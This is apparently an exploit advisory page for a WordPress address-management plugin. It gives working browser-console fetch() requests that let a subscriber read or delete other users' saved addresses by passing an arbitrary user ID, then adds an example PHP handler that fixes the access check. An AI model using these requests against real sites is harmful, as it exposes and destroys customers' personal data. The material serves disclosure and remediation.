## https://sploitus.com/exploit?id=WPEX-ID:E39C0171-ED4A-4143-9A31-C407E3555EEC
Run the commands below in the browser's developer console while on the blog, logged in as a subscriber user (note: the addresses manipulated are those added via the plugin, not WC).

To retrieve the first address of the user with ID 1750:

```js
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wcmca_get_address_by_id&address_id=0&user_id=1750',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

Other possible values for address_id: last_used_billing, last_used_shipping, checkout_data.

To delete the address with ID 1 of the user with ID 1750 (to be executed on the Edit Address page when logged in as a subscriber, e.g. http://example.com/my-account/edit-address/):

```js
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wcmca_delete_address&wcmca_delete_id=0&wcmca_user_id=1&wcmca_security_token=' + wcmca_address_form['security_token'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

It is also possible to add/update an address of an arbitrary user via the wcmca_save_new_address AJAX action.
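
The requests above succeed because the server acts on whatever user ID the client sends. The following is an added example of a handler that ties the target user to the session; it is not the plugin's code. The action and parameter names come from the requests above, while the `example_` functions, the nonce action string, the meta key and the storage layout are assumptions.

```php
<?php
// Added example (not the plugin's code). Requires WordPress. The nonce action
// string, meta key and storage layout below are hypothetical.

/**
 * Decide which user the request may act on. A client-supplied user ID is
 * honoured only if it is the session user or the caller may edit that user.
 */
function example_wcmca_resolve_target_user( $requested_id ) {
    $current_id = get_current_user_id();
    if ( 0 === $current_id ) {
        return new WP_Error( 'not_logged_in', 'Authentication required.' );
    }
    $requested_id = absint( $requested_id );
    if ( 0 === $requested_id || $requested_id === $current_id ) {
        return $current_id;
    }
    if ( current_user_can( 'edit_user', $requested_id ) ) {
        return $requested_id; // e.g. an administrator managing a customer
    }
    return new WP_Error( 'forbidden', 'Not allowed to access this user.' );
}

function example_wcmca_get_address_by_id() {
    // The nonce only stops cross-site requests. It is not an authorization
    // check: a subscriber's own token is valid, as the delete request shows.
    check_ajax_referer( 'example_wcmca_nonce', 'wcmca_security_token' );

    $requested = isset( $_POST['user_id'] ) ? wp_unslash( $_POST['user_id'] ) : 0;
    $user_id   = example_wcmca_resolve_target_user( $requested );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message(), 403 );
    }

    $address_id = isset( $_POST['address_id'] )
        ? sanitize_key( wp_unslash( $_POST['address_id'] ) ) : '';
    $addresses  = get_user_meta( $user_id, 'example_wcmca_addresses', true );
    if ( ! is_array( $addresses ) || ! isset( $addresses[ $address_id ] ) ) {
        wp_send_json_error( 'Address not found.', 404 );
    }
    wp_send_json_success( $addresses[ $address_id ] );
}
// Registered for logged-in users only; no wp_ajax_nopriv_ hook is added.
add_action( 'wp_ajax_wcmca_get_address_by_id', 'example_wcmca_get_address_by_id' );
```

The same `example_wcmca_resolve_target_user()` check would apply to the `wcmca_user_id` parameter of `wcmca_delete_address` and to `wcmca_save_new_address`.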